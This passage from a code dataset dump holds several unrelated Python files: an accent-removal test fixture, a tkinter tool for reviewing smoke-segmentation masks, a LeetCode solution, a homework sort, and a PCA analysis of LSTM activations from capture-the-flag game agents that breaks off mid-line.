},\n {\n \"input\": u\"ậẬệỆộỘ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ợỢựỰ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"蟒蛇\",\n \"answer\": u\"蟒蛇\",\n },\n {\n \"input\": u\" \",\n \"answer\": u\" \",\n },\n {\n \"input\": u\"!@#$%^&*()_+,./<>?\",\n \"answer\": u\"!@#$%^&*()_+,./<>?\",\n },\n {\n \"input\": u\"\",\n \"answer\": u\"\",\n },\n ]\n}\n","repo_name":"buganini/checkio-task-remove-accents","sub_path":"verification/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33362171454","text":"import data_tools\nimport json\nimport numpy as np\nimport visuals\nimport os\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nimport cv2\nimport tkinter.font as font\n\n\nclass manual_evaluation_ui:\n\n def __init__(self, BLACKLIST_FP):\n\n self.BLACKLIST_FP = BLACKLIST_FP\n\n self.window = tk.Tk()\n\n # Set window dimensions (width x height)\n self.window_width = 1410\n self.window_height = 700\n\n # Get the screen width and height\n self.screen_width = self.window.winfo_screenwidth()\n self.screen_height = self.window.winfo_screenheight()\n\n # Calculate the x and y position to center the window on the screen\n self.x_position = (self.screen_width - self.window_width) // 2\n self.y_position = (self.screen_height - self.window_height) // 2\n\n # Set the window size and position\n self.window.geometry(f\"{self.window_width}x{self.window_height}+{self.x_position}+{self.y_position}\")\n\n def build(self, img, mask, combined, res, img_fp, mask_fp, n_smoke_pixels, contains_smoke, completion_status):\n\n def top_text():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n text_frame_width = self.window_width - right_margin - left_margin\n text_frame_height = 90 - bottom_margin - top_margin\n\n text_frame = tk.Frame(self.window, width = text_frame_width, height = text_frame_height, bg = 'white')\n text_frame.place(x = left_margin, y = top_margin)\n\n text_label = tk.Label(text_frame, text = 'Image path: %s\\nMask path: %s'%(img_fp, mask_fp), wraplength = text_frame_width, anchor = 'w', justify = 'left')\n text_label.pack()\n\n def left_text():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n text_frame_width = self.window_width - combined_outer_frame_shape[0] - 3 * right_margin - left_margin\n text_frame_height = self.window_width - 4 * 90 - 40\n\n text_frame = tk.Frame(self.window, width = text_frame_width, height = text_frame_height, bg = 'white')\n text_frame.place(x = left_margin, y = 90)\n\n text_label = tk.Label(text_frame, text = 'Resolution: %dx%d\\nContains Smoke: %s\\nNumber of smoke px:\\n%d\\nStatus: %.2f%%'%(res[1], res[0], contains_smoke, n_smoke_pixels, completion_status), wraplength = text_frame_width, anchor = 'w', justify = 'left')\n text_label.pack()\n\n def upper_button():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n button_frame_width = 170\n button_frame_height = 100\n\n button_frame = tk.Frame(self.window, width = button_frame_width, height = button_frame_height)\n button_frame.place(x = left_margin, y = self.window_height - 2* (button_frame_height + bottom_margin))\n\n button = tk.Button(button_frame, text = 'NEXT [N]', width = button_frame_width // 10, height = button_frame_height // 10 - 5, bg = 'green', command = Next, font = DefaultFont, wraplength = button_frame_width - 20)\n button.place(x = -33, y = -8)\n\n def bottom_button():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n button_frame_width = 170\n button_frame_height = 100\n\n button_frame = tk.Frame(self.window, width = button_frame_width, height = button_frame_height)\n button_frame.place(x = left_margin, y = self.window_height - (button_frame_height + bottom_margin))\n\n button = tk.Button(button_frame, text = 'ADD TO BLACKLIST [B]', width = button_frame_width // 10, height = button_frame_height // 10 - 5, bg = 'maroon', command = Add2Blacklist, font = DefaultFont, wraplength = button_frame_width - 30)\n button.place(x = -33, y = -8)\n\n def Add2Blacklist():\n\n with open(self.BLACKLIST_FP, mode = 'a') as file:\n file.write(img_fp + ', ' + mask_fp + '\\n')\n\n Next()\n\n def Next():\n self.window.quit()\n return False\n\n def event_handler(event):\n if event.char == 'q':\n exit()\n elif event.char == 'n':\n Next()\n elif event.char == 'b':\n Add2Blacklist()\n\n DefaultFont = font.Font(family = 'Lato', size = '15', weight = 'bold')\n\n ## ! Build right image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n combined_shape = [combined.shape[1], combined.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n combined_outer_frame_shape = (800, 600)\n\n outer_combined_frame = tk.Frame(self.window, width = combined_outer_frame_shape[0], height = combined_outer_frame_shape[1], bg = 'black')\n outer_combined_frame.place(x = self.window_width - combined_outer_frame_shape[0] - right_margin, y = self.window_height - combined_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n combined_aspect_ratio = combined_shape[1] / combined_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n combined_shape[0] = combined_outer_frame_shape[0]\n combined_shape[1] = int(combined_aspect_ratio * combined_shape[0])\n if combined_shape[1] > combined_outer_frame_shape[1]:\n combined_shape[1] = combined_outer_frame_shape[1]\n combined_shape[0] = int(combined_shape[1] / combined_aspect_ratio)\n combined = cv2.resize(combined, (combined_shape[0], combined_shape[1]))\n combined = Image.fromarray(combined)\n combined_tk = ImageTk.PhotoImage(combined)\n combined_inner_frame_shape = \\\n (\n combined_shape[0],\n combined_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_combined_frame = tk.Frame(outer_combined_frame, width = combined_inner_frame_shape[0], height = combined_inner_frame_shape[1], bg=\"white\")\n inner_combined_frame.place(x = combined_outer_frame_shape[0] // 2 - combined_inner_frame_shape[0] // 2, y = combined_outer_frame_shape[1] // 2 - combined_inner_frame_shape[1] // 2)\n\n combined_label = tk.Label(inner_combined_frame, image = combined_tk, bg = 'white')\n combined_label.grid(column = 0, row = 0)\n\n ## ! Build right image frame: End\n\n ## ! Build left top image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n img_shape = [img.shape[1], img.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n img_outer_frame_shape = (400, 300)\n\n outer_img_frame = tk.Frame(self.window, width = img_outer_frame_shape[0], height = img_outer_frame_shape[1], bg = 'black')\n outer_img_frame.place(x = self.window_width - img_outer_frame_shape[0] - 2 * right_margin - combined_outer_frame_shape[0], y = self.window_height - 2* img_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n img_aspect_ratio = img_shape[1] / img_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n img_shape[0] = img_outer_frame_shape[0]\n img_shape[1] = int(img_aspect_ratio * img_shape[0])\n if img_shape[1] > img_outer_frame_shape[1]:\n img_shape[1] = img_outer_frame_shape[1]\n img_shape[0] = int(img_shape[1] / img_aspect_ratio)\n img = cv2.resize(img, (img_shape[0], img_shape[1]))\n img = Image.fromarray(img)\n img_tk = ImageTk.PhotoImage(img)\n img_inner_frame_shape = \\\n (\n img_shape[0],\n img_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_img_frame = tk.Frame(outer_img_frame, width = img_inner_frame_shape[0], height = img_inner_frame_shape[1], bg=\"white\")\n inner_img_frame.place(x = img_outer_frame_shape[0] // 2 - img_inner_frame_shape[0] // 2, y = img_outer_frame_shape[1] // 2 - img_inner_frame_shape[1] // 2)\n\n img_label = tk.Label(inner_img_frame, image = img_tk, bg = 'white')\n img_label.grid(column = 0, row = 0)\n\n ## ! Build left top image frame: End\n\n ## ! Build left bottom image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n mask_shape = [mask.shape[1], mask.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n mask_outer_frame_shape = (400, 300)\n\n outer_mask_frame = tk.Frame(self.window, width = mask_outer_frame_shape[0], height = mask_outer_frame_shape[1], bg = 'black')\n outer_mask_frame.place(x = self.window_width - mask_outer_frame_shape[0] - 2 * right_margin - combined_outer_frame_shape[0], y = self.window_height - mask_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n mask_aspect_ratio = mask_shape[1] / mask_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n mask_shape[0] = mask_outer_frame_shape[0]\n mask_shape[1] = int(mask_aspect_ratio * mask_shape[0])\n if mask_shape[1] > mask_outer_frame_shape[1]:\n mask_shape[1] = mask_outer_frame_shape[1]\n mask_shape[0] = int(mask_shape[1] / mask_aspect_ratio)\n mask = cv2.resize(mask, (mask_shape[0], mask_shape[1]))\n mask = Image.fromarray(255 * mask)\n mask_tk = ImageTk.PhotoImage(mask)\n mask_inner_frame_shape = \\\n (\n mask_shape[0],\n mask_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_mask_frame = tk.Frame(outer_mask_frame, width = mask_inner_frame_shape[0], height = mask_inner_frame_shape[1], bg=\"white\")\n inner_mask_frame.place(x = mask_outer_frame_shape[0] // 2 - mask_inner_frame_shape[0] // 2, y = mask_outer_frame_shape[1] // 2 - mask_inner_frame_shape[1] // 2)\n\n mask_label = tk.Label(inner_mask_frame, image = mask_tk, bg = 'white')\n mask_label.grid(column = 0, row = 0)\n\n ## ! Build left bottom image frame: End\n\n ## Top text\n top_text()\n\n ## Left text\n left_text()\n\n ## Bottom button\n bottom_button()\n\n ## Bottom button\n upper_button()\n\n self.window.bind('', event_handler)\n ## Must be on the same function otherwise garbage collector can ruin features\n self.window.mainloop()\n\n return True\n\ndef manual_evaluation_sequence(BLACKLIST_FP = '../blacklisted_instances.list', paths_fp = '../paths.json'):\n\n def session_save(mask_fp):\n\n with open(session_fp, 'w') as file:\n file.write(mask_fp)\n\n with open(file = paths_fp, mode = 'r') as json_file:\n paths_json = json.load(json_file)\n\n session_fp = '../session.path'\n\n if os.path.isfile(session_fp):\n print('W: Previous session found')\n start_over_trigger = input('Start over? Yes [Y] or No [N]\\n> ')\n while start_over_trigger not in {'Y', 'N'}:\n start_over_trigger = input('Enter a proper answer\\n> ')\n start_over_trigger = start_over_trigger == 'Y'\n if start_over_trigger:\n if os.path.isfile(BLACKLIST_FP):\n os.remove(BLACKLIST_FP)\n os.remove(session_fp)\n\n if os.path.isfile(session_fp):\n print('Loading previous session')\n with open(session_fp, 'r') as file:\n mask_session_fp = file.read()\n load_session_trigger = True\n else:\n print('Creating a new session')\n load_session_trigger = False\n\n dataset_dp = paths_json['ssmoke_data_dp']\n if dataset_dp[-1] != '/': dataset_dp += '/'\n\n data = data_tools.SegmData(dataset_dp = dataset_dp)\n\n ui = manual_evaluation_ui(BLACKLIST_FP = BLACKLIST_FP)\n\n while next(data):\n\n img = data.img\n mask = data.mask\n res = img.shape[:-1]\n img_fp = data.img_fp\n mask_fp = data.mask_fp\n n_smoke_pixels = data.n_smoke_pixels\n contains_smoke = 'Positive' if n_smoke_pixels > 0 else 'Negative'\n\n if load_session_trigger:\n if mask_fp == mask_session_fp:\n load_session_trigger = False\n else:\n continue\n\n combined = visuals.combine_img_mask(img = img, mask = mask)\n\n completion_status = 100*(data.INSTANCE_IDX+1)/data.n_instances\n\n ui.build(img = img, mask = mask, combined = combined, res = res, img_fp = img_fp, mask_fp = mask_fp, n_smoke_pixels = n_smoke_pixels, contains_smoke = contains_smoke, completion_status = completion_status)\n\n print('Completion status: %.2f%%'%(completion_status))\n\n session_save(mask_fp = mask_fp)\n\n\nif __name__ == '__main__':\n\n manual_evaluation_sequence()\n\n","repo_name":"fl0wxr/SmokeSegmenter","sub_path":"src/manual_evaluation.py","file_name":"manual_evaluation.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21841103210","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, a1, a2):\n if a1 == None:\n return a2\n \n if a2 == None:\n return a1\n \n sval = a1.val + a2.val\n if sval < 10:\n answer = ListNode(sval)\n answer.next = self.addTwoNumbers(a1.next, a2.next)\n return answer\n else:\n rval = a1.val + a2.val-10\n answer = ListNode(rval)\n answer.next = self.addTwoNumbers(ListNode(1), self.addTwoNumbers(a1.next, a2.next))\n return answer\n","repo_name":"leoh192/my-learning-notes","sub_path":"Leetcode/2_Add Two Numbers_06170231.py","file_name":"2_Add Two Numbers_06170231.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18169853081","text":"\"\"\"\nproblem2.py\nWritten By: Devon Bray for CS2223\n\nSorts a list containing values between 0 and 1000 in linear time\n\nTo run: python problem2.py\n\"\"\"\n\nfrom random import sample\n\n\ndef order_n_sort(items):\n\n d = {}\n\n for item in items:\n while True: # will re-try if the item isn't found\n try:\n d[item].append(item)\n break\n except KeyError:\n d[item] = []\n\n sorted_list = []\n\n for x in range(1000):\n try:\n sorted_list += d[x]\n except KeyError:\n pass # ignore the items that don't show up\n\n return sorted_list\n\nif __name__ == \"__main__\":\n unsorted_randoms = sample(range(1000), 100)\n print(\"Unsorted: \" + str(unsorted_randoms))\n\n sorted_randoms = order_n_sort(unsorted_randoms)\n print(\"Sorted: \" + str(sorted_randoms))\n","repo_name":"esologic/cs2223","sub_path":"Homework 1/python/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41182189759","text":"from os.path import join\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats import zscore\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom itertools import combinations\nfrom statistical_tests import bootstrap_test, fisher_mean\nfrom statsmodels.stats.multitest import multipletests\n\n# Load helper function(s) for interacting with CTF dataset\nfrom ctf_dataset.load import create_wrapped_dataset\n\nbase_dir = '/mnt/bucket/labs/hasson/snastase/social-ctf'\ndata_dir = join(base_dir, 'data')\n\n# Create wrapped CTF dataset\nwrap_f = create_wrapped_dataset(data_dir, output_dataset_name=\"virtual.hdf5\")\n\nn_lstms = 512\nn_repeats = 8\nn_players = 4\nmap_id = 0\n\n# Get matchups with all same agents (e.g. AA vs AA)\nagent_ids = wrap_f['map/matchup/repeat/player/agent_id'][0, :, :, :, 0]\nmatchup_ids = np.all(agent_ids[:, 0, :] == \n agent_ids[:, 0, 0][:, np.newaxis], axis=1)\nn_matchups = np.sum(matchup_ids) # 0, 34, 49, 54\n\n\n# Extract LSTMs for one map and matchup\nlstm = 'lstm'\n\nlstms_matched = wrap_f[f'map/matchup/repeat/player/time/{lstm}'][\n map_id, matchup_ids, ...].astype(np.float32)\nprint(\"Loaded LSTMs for within-population matchups\")\n\n# Apply tanh to LSTMs\nif lstm == 'lstm':\n lstms_matched = np.tanh(lstms_matched)\n\n\n# Matchup-, repeat-, player-specific PCA\nk = n_lstms\n\nlstm_within_pca = {}\nfor m in np.arange(n_matchups):\n lstm_within_pca[m] = {}\n for r in np.arange(n_repeats):\n lstm_within_pca[m][r] = {}\n for p in np.arange(n_players):\n lstm_within_pca[m][r][p] = {}\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(\n zscore(lstms_matched[m, r, p], axis=0))\n lstm_within_pca[m][r][p]['transformed'] = transformed\n lstm_within_pca[m][r][p]['pca'] = pca\n print(f\"Finished running PCA for matchup {m}, \"\n f\"repeat {r}, player {p}\")\n\nnp.save('results/within-pca_tanh-z_results.npy', lstm_within_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_within_pca_long = {'population': [], 'repeat': [], 'player': [],\n 'variance explained': [], 'dimension': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\n\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n for k, v in enumerate(lstm_within_pca[m][r][p][\n 'pca'].explained_variance_ratio_):\n lstm_within_pca_long['population'].append(pops[m])\n lstm_within_pca_long['repeat'].append(r)\n lstm_within_pca_long['player'].append(p)\n lstm_within_pca_long['variance explained'].append(v)\n lstm_within_pca_long['dimension'].append(k + 1)\n\nlstm_within_pca_long = pd.DataFrame(lstm_within_pca_long)\n\nmax_k = 30\nlstm_within_pca_trunc = lstm_within_pca_long[\n lstm_within_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.relplot(data=lstm_within_pca_trunc, x='dimension',\n y='variance explained', hue='repeat',\n col='population', col_wrap=2,\n kind='line')\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, n_repeats, n_players, len(percents)))\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n for i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_within_pca[m][r][p][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, r, p, i] = k\n\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, ..., i]))\n min = int(np.amin(percents_vaf[m, ..., i]))\n max = int(np.amax(percents_vaf[m, ..., i]))\n print(f\"Population {pops[m]}: {median} dimensions \"\n f\"for {perc} variance (range: {min}-{max})\")\n print('\\n')\n\n\n# Horizontally stack pairs of players and compute joint PCA\npairs = list(combinations(np.arange(n_players), 2))\nn_pairs = len(pairs)\n\nk = n_lstms * 2\n\ncoop_ids, comp_ids = [0, 5], [1, 2, 3, 4]\n\nlstm_pair_pca = {}\nfor m in np.arange(n_matchups):\n lstm_pair_pca[m] = {}\n for r in np.arange(n_repeats):\n lstm_pair_pca[m][r] = {}\n for p, pair in enumerate(pairs):\n lstm_pair_pca[m][r][p] = {}\n stack_lstm = np.hstack((lstms_matched[m, r, pair[0]],\n lstms_matched[m, r, pair[1]]))\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(\n zscore(stack_lstm, axis=0))\n lstm_pair_pca[m][r][p]['transformed'] = transformed\n lstm_pair_pca[m][r][p]['pca'] = pca\n print(f\"Finished running PCA for matchup {m}, \"\n f\"repeat {r}, pair {pair}\")\n \nnp.save('results/pair-pca_lstm_tanh-z_results.npy', lstm_pair_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_pair_pca_long = {'population': [], 'repeat': [], 'pair': [],\n 'variance explained': [], 'dimension': [],\n 'type': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\npair_type = {c:('cooperative' if c in coop_ids else 'competitive')\n for c in np.arange(n_pairs)}\n\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_pairs):\n for k, v in enumerate(lstm_pair_pca[m][r][p][\n 'pca'].explained_variance_ratio_):\n lstm_pair_pca_long['population'].append(pops[m])\n lstm_pair_pca_long['repeat'].append(r)\n lstm_pair_pca_long['pair'].append(p)\n lstm_pair_pca_long['variance explained'].append(v)\n lstm_pair_pca_long['dimension'].append(k + 1)\n lstm_pair_pca_long['type'].append(pair_type[p])\n\nlstm_pair_pca_long = pd.DataFrame(lstm_pair_pca_long)\n\nmax_k = 10\nlstm_pair_pca_trunc = lstm_pair_pca_long[\n lstm_pair_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.relplot(data=lstm_pair_pca_trunc, x='dimension',\n y='variance explained', hue='type',\n col='population', col_wrap=2, linewidth=3,\n kind='line')\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, n_repeats, n_pairs, len(percents)))\nfor m in np.arange(n_matchups):\n for r in np.arange(n_repeats):\n for p in np.arange(n_pairs):\n for i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_pair_pca[m][r][p][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, r, p, i] = k\n\nfor m in np.arange(n_matchups):\n for type, c in zip(['cooperative', 'competitive'],\n [coop_ids, comp_ids]):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, :, c, i]))\n min = int(np.amin(percents_vaf[m, :, c, i]))\n max = int(np.amax(percents_vaf[m, :, c, i]))\n print(f\"Population {pops[m]} {type}: {median} dimensions \"\n f\"for {perc} variance (range: {min}-{max})\")\n print('\\n')\n\n\n# Stack across all repeats and run PCA\nk = n_lstms\n\nlstm_stack_pca = {}\nfor m in np.arange(n_matchups):\n lstm_stack_pca[m] = {}\n \n stack_lstm = []\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n stack_lstm.append(zscore(lstms_matched[m, r, p],\n axis=0))\n \n stack_lstm = np.vstack(stack_lstm)\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(stack_lstm)\n\n lstm_stack_pca[m]['transformed'] = transformed\n lstm_stack_pca[m]['pca'] = pca\n print(f\"Finished running stacked PCA for matchup {m}\")\n \nnp.save('results/stack-pca_lstm_tanh-z_results.npy', lstm_stack_pca)\n\n# Convert PCA outputs to long dictionary for plotting\nlstm_stack_pca_long = {'population': [], 'variance explained': [],\n 'dimension': []}\n\npops = {0: 'A', 1: 'B', 2: 'C', 3: 'D'}\n\nfor m in np.arange(n_matchups):\n for k, v in enumerate(lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_):\n lstm_stack_pca_long['population'].append(pops[m])\n lstm_stack_pca_long['variance explained'].append(v)\n lstm_stack_pca_long['dimension'].append(k + 1)\n\nlstm_stack_pca_long = pd.DataFrame(lstm_stack_pca_long)\n\nmax_k = 8\nlstm_stack_pca_trunc = lstm_stack_pca_long[\n lstm_stack_pca_long['dimension'] <= max_k]\n \nsns.set(font_scale=1.2, style='white')\nsns.lineplot(data=lstm_stack_pca_trunc, x='dimension',\n y='variance explained', hue='population',\n linewidth=3)\n\n# Compute number of components required for percentage variance\npercents = [.5, .75, .9, .95, .99]\n\npercents_vaf = np.zeros((n_matchups, len(percents)))\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[m, i] = k\n\nfor m in np.arange(n_matchups):\n for i, perc in enumerate(percents):\n median = int(np.median(percents_vaf[m, i]))\n print(f\"Population {pops[m]}: {median} dimensions \"\n f\"for {perc} variance\")\n print('\\n')\n\n\n# Plot scree plot of variance accounted\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nmatchup = 0\npca_k = 100\nevr = lstm_stack_pca[matchup]['pca'].explained_variance_ratio_\nevr_cum = np.cumsum(evr)\ndimensions = np.arange(1, 513)\n\npercents = [.9, .95, .99]\npercents_vaf = {}\nfor i, perc in enumerate(percents):\n k = np.sum(np.cumsum(\n lstm_stack_pca[m][\n 'pca'].explained_variance_ratio_) <= perc) + 1 \n percents_vaf[k] = perc\n\nfig, ax = plt.subplots(figsize=(5.5, 4.5))\nax.scatter(dimensions, evr, color='.5')\nax.scatter(dimensions[:pca_k], evr[:pca_k], color='tab:red')\nax.set_xlabel('dimensions')\nax.set_ylabel('proportion of\\nvariance explained')\nfor k, perc in percents_vaf.items():\n ax.axvline(k, 0, .35, color='.5', zorder=-1)\n ax.annotate(f'{perc:.0%}', xy=(k + 10, .37), ha='center',\n xycoords=('data', 'axes fraction'))\naxins = inset_axes(ax, width=1.2, height=1)\naxins.scatter(dimensions, evr_cum, color='.5')\naxins.scatter(dimensions[:pca_k], evr_cum[:pca_k], color='tab:red')\naxins.xaxis.set_ticks([])\naxins.yaxis.set_ticks([])\naxins.set_xlabel('dimensions', size=12)\naxins.set_ylabel('cumulative\\nvariance', size=12)\nplt.savefig(f'figures/scree_tanh-z_pca-k{pca_k}_m{matchup}.png', dpi=300,\n bbox_inches='tight')\n \n \n# Create reduced-dimension version of data (e.g. k = 100)\nk = 100\n\nlstm_pca_reduce = []\nfor m in np.arange(n_matchups):\n \n stack_lstm = []\n for r in np.arange(n_repeats):\n for p in np.arange(n_players):\n stack_lstm.append(zscore(lstms_matched[m, r, p],\n axis=0))\n \n stack_lstm = np.vstack(stack_lstm)\n pca = PCA(n_components=k)\n transformed = pca.fit_transform(stack_lstm)\n \n percent_vaf = np.sum(pca.explained_variance_ratio_)\n \n # Un-stack PCA-transformed arrays for repeats, players\n unstack_lstm = np.stack(np.split(np.stack(\n np.split(transformed, 8), axis=0), 4, axis=1), axis=1)\n \n lstm_pca_reduce.append(unstack_lstm)\n print(f\"Finished running stacked PCA for matchup {m}\")\n print(f\"Proportion variance at for matchup {m} at k = {k}: \"\n f\"{percent_vaf:.3f}\")\n \nlstm_pca_reduce = np.stack(lstm_pca_reduce, axis=0)\n\nnp.save(f'results/lstms_tanh-z_pca-k{k}.npy', lstm_pca_reduce)\n\n\n# Plot some example PC time series\nk = 100\nlstms_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\n\n\n### Get rid of everything south of heres\n\n# Compute correlations for PC in comparison to game variable \nfrom features import get_features\nfrom scipy.stats import pearsonr\n\n# Load pre-saved PCA's \nk = 100\nlstm_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\n\n\n# Exclude degenerate features from analysis \nfeature_set = ['position', 'health', 'events']\nall_features, labels = get_features(wrap_f, feature_set=feature_set,\n map_id=map_id, matchup_id=matchup_ids,\n player_id=slice(None),\n repeat_id=slice(None))\n\nfeatures_exclude = []\nfor label in labels: \n features = all_features[..., np.array(labels) == label]\n n_nonzeros = np.sum(np.nonzero(features))\n print(f'checking {label} for all nonzeros; \"found {n_nonzeros} nonzeros')\n if n_nonzeros == 0:\n features_exclude.append(label)\n print(f'excluding {label}')\n \nlabels = [l for l in labels if l not in features_exclude] \n \n# Define a single variable to pull stats from\n# (this may be redundant, review later)\npca_corrs = {}\nfor game_var in labels:\n features = all_features[..., np.array(labels) == game_var]\n # code is breaking above because new labels code that\n # removes degenerative features does not match dimensions of \n feature_shape = features.shape[:-2]\n pca_corrs[game_var] = np.full(feature_shape + (k,), np.nan)\n \n for matchup_id in np.arange(n_matchups):\n for repeat_id in np.arange(n_repeats): \n for player_id in np.arange(n_players): \n for pc_id in np.arange(k):\n pc_corr = pearsonr(features[matchup_id, repeat_id, player_id, :, 0],\n lstm_pca[matchup_id, repeat_id, player_id,\n :, pc_id])[0]\n pca_corrs[game_var][matchup_id, repeat_id, player_id, pc_id] = pc_corr\n \n\n print(f\"finished pca correlations w/ {game_var}\")\n\n# Save dictionary \nnp.save(f'results/lstm_pca-k{k}_feature_correlations.npy', pca_corrs)\n\n\n# Summarize PCA correlations across players and repeats\npca_corrs = np.load('results/lstm_pca-k100_feature_correlations.npy',\n allow_pickle=True)\npca_corr_means = []\n\nfor game_var in pca_corrs:\n pca_corr_means.append(np.nanmean(pca_corrs[game_var], axis=(1, 2)))\n\npca_corr_means = np.stack(pca_corr_means, 1)\n\nassert pca_corr_means.shape[1] == len(labels)\n\npc_id = 2\nfor pc_id in np.arange(1,10):\n plt.matshow(pca_corr_means[..., pc_id], cmap='RdBu_r')\n plt.yticks([0, 1, 2, 3], ['A','B','C','D'])\n plt.xticks(np.arange(pca_corr_means.shape[1]), labels, rotation=90);\n plt.title(f'PCA Feature Correlations for PC{pc_id}')\n plt.colorbar()\n\n\n# Look at some properties of the PCA-reduced LSTMs\nk = 100\n#lstm_pca_reduce = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')\nlstm_pca_reduce = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-pre.npy')\n\n# Look at ISC of PCs for individual games\nmatchup, repeat = 0, 0\n\nn_pcs = 10\nfig, axs = plt.subplots(2, 5, figsize=(25, 8))\nfor pc, ax in zip(np.arange(n_pcs), axs.ravel()):\n corr = np.corrcoef(lstm_pca_reduce[matchup, repeat, ..., pc])\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n\n\n# Look at ISC of PCs averaged across games\npca_k = 100\nmatchup = 0\nn_repeats = 8\n\nn_pcs = 10\nfig, axs = plt.subplots(2, 5, figsize=(25, 8))\nfor pc, ax in zip(np.arange(n_pcs), axs.ravel()):\n corr = fisher_mean([np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)], axis=0)\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n#plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{pca_k}_m{matchup}.png',\n# dpi=300, bbox_inches='tight')\nplt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{pca_k}_reg-pre_m{matchup}.png',\n dpi=300, bbox_inches='tight')\n \n\n# Specific subset of PCs averaged across games\nmatchup = 0\nn_repeats = 8\n\npcs = [2, 5, 9]\nfig, axs = plt.subplots(1, len(pcs), figsize=(12, 2.8))\nfor pc, ax in zip(pcs, axs.ravel()):\n corr = np.mean([np.corrcoef(lstm_pca_reduce[matchup, r, ..., pc])\n for r in np.arange(n_repeats)], axis=0)\n sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,\n cmap='RdBu_r', xticklabels=False, yticklabels=False,\n fmt='.2f', ax=ax)\n ax.set_title(f'PC{pc + 1}')\n\n \n# Difference in cooperative/competitive ISC across PCs\nmatchup = 0\nn_repeats = 8\nn_pcs = 100\n\nisc_diffs = []\nisc_diffs_df = {'difference': [], 'PC': [], 